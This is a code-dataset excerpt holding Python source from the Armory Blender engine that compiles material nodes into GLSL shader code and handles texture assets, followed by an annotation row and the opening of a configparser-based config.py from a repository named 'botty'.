out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2])
# use Extension parameter from the Texture node instead
# if node.use_min:
# out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1])
# if node.use_max:
# out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1])
return out
elif node.type == 'NORMAL':
if socket == node.outputs[0]:
return to_vec3(node.outputs[0].default_value)
elif socket == node.outputs[1]: # TODO: is parse_value path preferred?
nor = parse_vector_input(node.inputs[0])
return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'NORMAL_MAP':
if curshader == tese:
return parse_vector_input(node.inputs[1])
else:
#space = node.space
#map = node.uv_map
# Color
parse_normal_map_color_input(node.inputs[1], node.inputs[0])
return None
elif node.type == 'VECT_TRANSFORM':
#type = node.vector_type
#conv_from = node.convert_from
#conv_to = node.convert_to
# Pass throuh
return parse_vector_input(node.inputs[0])
elif node.type == 'COMBXYZ':
x = parse_value_input(node.inputs[0])
y = parse_value_input(node.inputs[1])
z = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(x, y, z)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'ADD':
return '({0} + {1})'.format(vec1, vec2)
elif op == 'SUBTRACT':
return '({0} - {1})'.format(vec1, vec2)
elif op == 'AVERAGE':
return '(({0} + {1}) / 2.0)'.format(vec1, vec2)
elif op == 'DOT_PRODUCT':
return 'vec3(dot({0}, {1}))'.format(vec1, vec2)
elif op == 'CROSS_PRODUCT':
return 'cross({0}, {1})'.format(vec1, vec2)
elif op == 'NORMALIZE':
return 'normalize({0})'.format(vec1)
elif node.type == 'DISPLACEMENT':
height = parse_value_input(node.inputs[0])
midlevel = parse_value_input(node.inputs[1])
scale = parse_value_input(node.inputs[2])
nor = parse_vector_input(node.inputs[3])
return '(vec3({0}) * {1})'.format(height, scale)
def parse_normal_map_color_input(inp, strength_input=None):
global normal_parsed
global frag
if basecol_only:
return
if inp.is_linked == False:
return
if normal_parsed:
return
normal_parsed = True
frag.write_normal += 1
if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix
frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
frag.write('texn.y = -texn.y;')
frag.add_include('std/normals.glsl')
frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);')
frag.write('n = TBN * normalize(texn);')
else:
frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
if strength_input != None:
strength = parse_value_input(strength_input)
if strength != '1.0':
frag.write('n.xy *= {0};'.format(strength))
frag.write('n = normalize(TBN * n);')
con.add_elem('tang', 'short4norm')
frag.write_normal -= 1
def parse_value_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_value_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return '{0}.x'.format(res_var)
else: # VALUE
return res_var
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec1(inp.default_value)
def parse_value(node, socket):
global particle_info
global sample_bump
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
# Displacement
if socket == node.outputs[1]:
return parse_value_input(node.inputs[7])
else:
return None
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'ATTRIBUTE':
# Pass time till drivers are implemented
if node.attribute_name == 'time':
curshader.add_uniform('float time', link='_time')
return 'time'
else:
return '0.0'
elif node.type == 'CAMERA':
# View Z Depth
if socket == node.outputs[1]:
curshader.add_include('std/math.glsl')
curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
return 'linearize(gl_FragCoord.z, cameraProj)'
# View Distance
else:
curshader.add_uniform('vec3 eye', link='_cameraPosition')
return 'distance(eye, wposition)'
elif node.type == 'FRESNEL':
curshader.add_function(c_functions.str_fresnel)
ior = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
return 'fresnel({0}, {1})'.format(ior, dotnv)
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[6]: # Backfacing
return '(1.0 - float(gl_FrontFacing))'
elif socket == node.outputs[7]: # Pointiness
return '0.0'
elif node.type == 'HAIR_INFO':
# Is Strand
# Intercept
# Thickness
return '0.5'
elif node.type == 'LAYER_WEIGHT':
blend = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
if socket == node.outputs[0]: # Fresnel
curshader.add_function(c_functions.str_fresnel)
return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv)
elif socket == node.outputs[1]: # Facing
return '(1.0 - pow({0}, ({1} < 0.5) ? 2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend)
elif node.type == 'LIGHT_PATH':
if socket == node.outputs[0]: # Is Camera Ray
return '1.0'
elif socket == node.outputs[1]: # Is Shadow Ray
return '0.0'
elif socket == node.outputs[2]: # Is Diffuse Ray
return '1.0'
elif socket == node.outputs[3]: # Is Glossy Ray
return '1.0'
elif socket == node.outputs[4]: # Is Singular Ray
return '0.0'
elif socket == node.outputs[5]: # Is Reflection Ray
return '0.0'
elif socket == node.outputs[6]: # Is Transmission Ray
return '0.0'
elif socket == node.outputs[7]: # Ray Length
return '0.0'
elif socket == node.outputs[8]: # Ray Depth
return '0.0'
elif socket == node.outputs[9]: # Transparent Depth
return '0.0'
elif socket == node.outputs[10]: # Transmission Depth
return '0.0'
elif node.type == 'OBJECT_INFO':
if socket == node.outputs[2]: # Object Index
curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex')
return 'objectInfoIndex'
elif socket == node.outputs[3]: # Material Index
curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex')
return 'objectInfoMaterialIndex'
elif socket == node.outputs[4]: # Random
curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom')
return 'objectInfoRandom'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[0]: # Index
particle_info['index'] = True
return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[1]: # Age
particle_info['age'] = True
return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[2]: # Lifetime
particle_info['lifetime'] = True
return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[4]: # Size
particle_info['size'] = True
return '1.0'
elif node.type == 'VALUE':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec1(node.outputs[0].default_value)
elif node.type == 'WIREFRAME':
#node.use_pixel_size
# size = parse_value_input(node.inputs[0])
return '0.0'
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[4])
res = 'tex_brick_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[3])
res = 'tex_checker_f({0}, {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = '(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.a'.format(store_var_name(node))
tex_name = safesrc(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link))
else:
tex_store = store_var_name(node) # Pink color for missing texture
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
return '{0}.a'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
# Fall back to noise
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_noise({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
return '0.0'
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'tex_voronoi({0} * {1}).a'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).r'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_wave_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'LIGHT_FALLOFF':
# Constant, linear, quadratic
# Shaders default to quadratic for now
return '1.0'
elif node.type == 'NORMAL':
nor = parse_vector_input(node.inputs[0])
return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'VALTORGB': # ColorRamp
return '1.0'
elif node.type == 'MATH':
val1 = parse_value_input(node.inputs[0])
val2 = parse_value_input(node.inputs[1])
op = node.operation
if op == 'ADD':
out_val = '({0} + {1})'.format(val1, val2)
elif op == 'SUBTRACT':
out_val = '({0} - {1})'.format(val1, val2)
elif op == 'MULTIPLY':
out_val = '({0} * {1})'.format(val1, val2)
elif op == 'DIVIDE':
out_val = '({0} / {1})'.format(val1, val2)
elif op == 'POWER':
out_val = 'pow({0}, {1})'.format(val1, val2)
elif op == 'LOGARITHM':
out_val = 'log({0})'.format(val1)
elif op == 'SQRT':
out_val = 'sqrt({0})'.format(val1)
elif op == 'ABSOLUTE':
out_val = 'abs({0})'.format(val1)
elif op == 'MINIMUM':
out_val = 'min({0}, {1})'.format(val1, val2)
elif op == 'MAXIMUM':
out_val = 'max({0}, {1})'.format(val1, val2)
elif op == 'LESS_THAN':
out_val = 'float({0} < {1})'.format(val1, val2)
elif op == 'GREATER_THAN':
out_val = 'float({0} > {1})'.format(val1, val2)
elif op == 'ROUND':
# out_val = 'round({0})'.format(val1)
out_val = 'floor({0} + 0.5)'.format(val1)
elif op == 'FLOOR':
out_val = 'floor({0})'.format(val1)
elif op == 'CEIL':
out_val = 'ceil({0})'.format(val1)
elif op == 'FRACT':
out_val = 'fract({0})'.format(val1)
elif op == 'MODULO':
# out_val = 'float({0} % {1})'.format(val1, val2)
out_val = 'mod({0}, {1})'.format(val1, val2)
elif op == 'SINE':
out_val = 'sin({0})'.format(val1)
elif op == 'COSINE':
out_val = 'cos({0})'.format(val1)
elif op == 'TANGENT':
out_val = 'tan({0})'.format(val1)
elif op == 'ARCSINE':
out_val = 'asin({0})'.format(val1)
elif op == 'ARCCOSINE':
out_val = 'acos({0})'.format(val1)
elif op == 'ARCTANGENT':
out_val = 'atan({0})'.format(val1)
elif op == 'ARCTAN2':
out_val = 'atan({0}, {1})'.format(val1, val2)
if node.use_clamp:
return 'clamp({0}, 0.0, 1.0)'.format(out_val)
else:
return out_val
elif node.type == 'RGBTOBW':
col = parse_vector_input(node.inputs[0])
return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col)
elif node.type == 'SEPHSV':
return '0.0'
elif node.type == 'SEPRGB':
col = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.r'.format(col)
elif socket == node.outputs[1]:
return '{0}.g'.format(col)
elif socket == node.outputs[2]:
return '{0}.b'.format(col)
elif node.type == 'SEPXYZ':
vec = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.x'.format(vec)
elif socket == node.outputs[1]:
return '{0}.y'.format(vec)
elif socket == node.outputs[2]:
return '{0}.z'.format(vec)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'DOT_PRODUCT':
return 'dot({0}, {1})'.format(vec1, vec2)
else:
return '0.0'
##
def vector_curve(name, fac, points):
# Write Ys array
ys_var = name + '_ys'
curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1]))
# Get index
fac_var = name + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(points)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, points[i].location[0])
# Write index
index_var = name + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
# Linear
# Write Xs array
facs_var = name + '_xs'
curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0]))
# Map vector
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var)
def write_normal(inp):
if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT':
normal_res = parse_vector_input(inp)
if normal_res != None:
curshader.write('n = {0};'.format(normal_res))
def is_parsed(s):
global parsed
return s in parsed
def res_var_name(node, socket):
return node_name(node.name) + '_' + safesrc(socket.name) + '_res'
def write_result(l):
global parsed
res_var = res_var_name(l.from_node, l.from_socket)
# Unparsed node
if not is_parsed(res_var):
parsed[res_var] = True
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
res = parse_vector(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('vec3 {0} = {1};'.format(res_var, res))
elif st == 'VALUE':
res = parse_value(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('float {0} = {1};'.format(res_var, res))
# Normal map already parsed, return
elif l.from_node.type == 'NORMAL_MAP':
return None
return res_var
def glsl_type(t):
if t == 'RGB' or t == 'RGBA' or t == 'VECTOR':
return 'vec3'
else:
return 'float'
def to_uniform(inp):
uname = safesrc(inp.node.name) + safesrc(inp.name)
curshader.add_uniform(glsl_type(inp.type) + ' ' + uname)
return uname
def store_var_name(node):
return node_name(node.name) + '_store'
def texture_store(node, tex, tex_name, to_linear=False, tex_link=None):
global sample_bump
global sample_bump_res
global parsed
tex_store = store_var_name(node)
if is_parsed(tex_store):
return tex_store
parsed[tex_store] = True
mat_bind_texture(tex)
con.add_elem('tex', 'short2norm')
curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link)
if node.inputs[0].is_linked:
uv_name = parse_vector_input(node.inputs[0])
uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name)
else:
uv_name = 'texCoord'
triplanar = node.projection == 'BOX'
if triplanar:
curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp
curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);')
curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;')
curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;')
curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;')
else:
if mat_texture_grad():
curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name))
else:
curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name))
if sample_bump:
sample_bump_res = tex_store
curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_4 = textureOffset({1}, {2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name))
sample_bump = False
if to_linear:
curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store))
return tex_store
def write_bump(node, res, scl=0.001):
global sample_bump
global sample_bump_res
sample_bump_res = store_var_name(node) + '_bump'
# Testing.. get function parts..
ar = res.split('(', 1)
pre = ar[0] + '('
if ',' in ar[1]:
ar2 = ar[1].split(',', 1)
co = ar2[0]
post = ',' + ar2[1]
else:
co = ar[1][:-1]
post = ')'
curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl))
sample_bump = False
def to_vec1(v):
return str(v)
def to_vec3(v):
return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2])
def node_by_type(nodes, ntype):
for n in nodes:
if n.type == ntype:
return n
def socket_index(node, socket):
for i in range(0, len(node.outputs)):
if node.outputs[i] == socket:
return i
def node_name(s):
for p in parents:
s = p.name + '_' + s
if curshader.write_textures > 0:
s += '_texread'
s = safesrc(s)
if '__' in s: # Consecutive _ are reserved
s = s.replace('_', '_x')
return s
##
def make_texture(image_node, tex_name, matname=None):
tex = {}
tex['name'] = tex_name
image = image_node.image
if matname is None:
matname = mat_state.material.name
if image is None:
return None
# Get filepath
filepath = image.filepath
if filepath == '':
if image.packed_file is not None:
filepath = './' + image.name
has_ext = filepath.endswith(('.jpg', '.png', '.hdr'))
if not has_ext:
# Raw bytes, write converted .jpg to /unpacked
filepath += '.raw'
elif image.source == "GENERATED":
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
filepath = os.path.join(unpack_path, image.name + ".jpg")
arm.utils.convert_image(image, filepath, "JPEG")
else:
arm.log.warn(matname + '/' + image.name + ' - invalid file path')
return None
# Reference image name
texpath = arm.utils.asset_path(filepath)
texfile = arm.utils.extract_filename(filepath)
tex['file'] = arm.utils.safestr(texfile)
s = tex['file'].rsplit('.', 1)
if len(s) == 1:
arm.log.warn(matname + '/' + image.name + ' - file extension required for image name')
return None
ext = s[1].lower()
do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image
if do_convert:
new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg'
tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' + new_ext
if image.packed_file is not None or not is_ascii(texfile):
# Extract packed data / copy non-ascii texture
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
unpack_filepath = os.path.join(unpack_path, tex['file'])
if do_convert:
if not os.path.isfile(unpack_filepath):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, unpack_filepath, file_format=fmt)
else:
# Write bytes if size is different or file does not exist yet
if image.packed_file is not None:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size:
with open(unpack_filepath, 'wb') as f:
f.write(image.packed_file.data)
# Copy non-ascii texture
else:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath):
shutil.copy(texpath, unpack_filepath)
arm.assets.add(unpack_filepath)
else:
if not os.path.isfile(arm.utils.asset_path(filepath)):
arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found(' + filepath + ')')
return None
if do_convert:
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
converted_path = os.path.join(unpack_path, tex['file'])
# TODO: delete cache when file changes
if not os.path.isfile(converted_path):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, converted_path, file_format=fmt)
arm.assets.add(converted_path)
else:
# Link image path to assets
# TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows
if arm.utils.get_os() == 'win':
s = filepath.rsplit('.', 1)
arm.assets.add(arm.utils.asset_path(s[0] + '.' + s[1].lower()))
else:
arm.assets.add(arm.utils.asset_path(filepath))
# if image_format != 'RGBA32':
# tex['format'] = image_format
interpolation = image_node.interpolation
rpdat = arm.utils.get_rp()
texfilter = rpdat.arm_texture_filter
if texfilter == 'Anisotropic':
interpolation = 'Smart'
elif texfilter == 'Linear':
interpolation = 'Linear'
elif texfilter == 'Point':
interpolation = 'Closest'
# TODO: Blender seems to load full images on size request, cache size instead
powimage = is_pow(image.size[0]) and is_pow(image.size[1])
if interpolation == 'Cubic': # Mipmap linear
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Smart': # Mipmap anisotropic
tex['min_filter'] = 'anisotropic'
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Closest':
tex['min_filter'] = 'point'
tex['mag_filter'] = 'point'
# else defaults to linear
if image_node.extension != 'REPEAT': # Extend or clip
tex['u_addressing'] = 'clamp'
tex['v_addressing'] = 'clamp'
if image.source == 'MOVIE':
tex['source'] = 'movie'
tex['min_filter'] = 'linear'
tex['mag_filter'] = 'linear'
tex['mipmap_filter'] = 'no'
tex['generate_mipmaps'] = False
return tex
def is_pow(num):
return ((num & (num - 1)) == 0) and num != 0
def is_ascii(s):
return len(s) == len(s.encode())
##
def get_rp_renderer():
return arm.utils.get_rp().rp_renderer
def get_arm_export_tangents():
return bpy.data.worlds['Arm'].arm_export_tangents
def safesrc(name):
return arm.utils.safesrc(name)
def get_sdk_path():
return arm.utils.get_sdk_path()
def disp_enabled():
return arm.utils.disp_enabled(arm.make_state.target)
def warn(text):
arm.log.warn(text)
def assets_add(path):
arm.assets.add(path)
def assets_add_embedded_data(path):
arm.assets.add_embedded_data(path)
def mat_name():
return mat_state.material.name
def mat_batch():
return mat_state.batch
def mat_bind_texture(tex):
mat_state.bind_textures.append(tex)
def mat_texture_grad():
return mat_state.texture_grad
def mat_get_material():
return mat_state.material
def mat_get_material_users():
return mat_state.mat_users
| [((1753, 4, 1753, 39), 'arm.material.mat_state.bind_textures.append', 'mat_state.bind_textures.append', ({(1753, 35, 1753, 38): 'tex'}, {}), '(tex)', True, 'import arm.material.mat_state as mat_state\n'), ((1628, 26, 1628, 64), 'os.path.join', 'os.path.join', ({(1628, 39, 1628, 50): 'unpack_path', (1628, 52, 1628, 63): "tex['file']"}, {}), "(unpack_path, tex['file'])", False, 'import os\n'), ((1626, 15, 1626, 42), 'os.path.exists', 'os.path.exists', ({(1626, 30, 1626, 41): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1627, 12, 1627, 36), 'os.makedirs', 'os.makedirs', ({(1627, 24, 1627, 35): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1657, 29, 1657, 67), 'os.path.join', 'os.path.join', ({(1657, 42, 1657, 53): 'unpack_path', (1657, 55, 1657, 66): "tex['file']"}, {}), "(unpack_path, tex['file'])", False, 'import os\n'), ((1600, 23, 1600, 69), 'os.path.join', 'os.path.join', ({(1600, 36, 1600, 47): 'unpack_path', (1600, 49, 1600, 68): "image.name + '.jpg'"}, {}), "(unpack_path, image.name + '.jpg')", False, 'import os\n'), ((1631, 19, 1631, 50), 'os.path.isfile', 'os.path.isfile', ({(1631, 34, 1631, 49): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1655, 19, 1655, 46), 'os.path.exists', 'os.path.exists', ({(1655, 34, 1655, 45): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1656, 16, 1656, 40), 'os.makedirs', 'os.makedirs', ({(1656, 28, 1656, 39): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1659, 19, 1659, 49), 'os.path.isfile', 'os.path.isfile', ({(1659, 34, 1659, 48): 'converted_path'}, {}), '(converted_path)', False, 'import os\n'), ((1597, 19, 1597, 46), 'os.path.exists', 'os.path.exists', ({(1597, 34, 1597, 45): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1598, 16, 1598, 40), 'os.makedirs', 'os.makedirs', ({(1598, 28, 1598, 39): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1644, 20, 1644, 57), 'shutil.copy', 'shutil.copy', ({(1644, 32, 1644, 39): 'texpath', (1644, 41, 1644, 56): 'unpack_filepath'}, {}), '(texpath, unpack_filepath)', False, 'import shutil\n'), ((1638, 23, 1638, 54), 'os.path.isfile', 'os.path.isfile', ({(1638, 38, 1638, 53): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1638, 58, 1638, 90), 'os.path.getsize', 'os.path.getsize', ({(1638, 74, 1638, 89): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1643, 23, 1643, 54), 'os.path.isfile', 'os.path.isfile', ({(1643, 38, 1643, 53): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1643, 58, 1643, 90), 'os.path.getsize', 'os.path.getsize', ({(1643, 74, 1643, 89): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1643, 94, 1643, 118), 'os.path.getsize', 'os.path.getsize', ({(1643, 110, 1643, 117): 'texpath'}, {}), '(texpath)', False, 'import os\n'), ((912, 100, 912, 111), 'math.cos', 'math.cos', ({(912, 109, 912, 110): 'a'}, {}), '(a)', False, 'import math\n'), ((912, 113, 912, 124), 'math.sin', 'math.sin', ({(912, 122, 912, 123): 'a'}, {}), '(a)', False, 'import math\n')] |
Jizanator/botty | src/config.py | 3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e | import configparser
import numpy as np
import os
class Config:
def _select_val(self, section: str, key: str = None):
if section in self._custom and key in self._custom[section]:
return self._custom[section][key]
elif section in self._config:
return self._config[section][key]
elif section in self._pickit_config:
return self._pickit_config[section][key]
elif section in self._shop_config:
return self._shop_config[section][key]
else:
return self._game_config[section][key]
def __init__(self, print_warnings: bool = False):
# print_warnings, what a hack... here it is, not making the effort
# passing a single config instance through bites me in the ass
self._print_warnings = print_warnings
self._config = configparser.ConfigParser()
self._config.read('config/params.ini')
self._game_config = configparser.ConfigParser()
self._game_config.read('config/game.ini')
self._pickit_config = configparser.ConfigParser()
self._pickit_config.read('config/pickit.ini')
self._shop_config = configparser.ConfigParser()
self._shop_config.read('config/shop.ini')
self._custom = configparser.ConfigParser()
if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'):
self._custom.read('config/custom.ini')
self.general = {
"saved_games_folder": self._select_val("general", "saved_games_folder"),
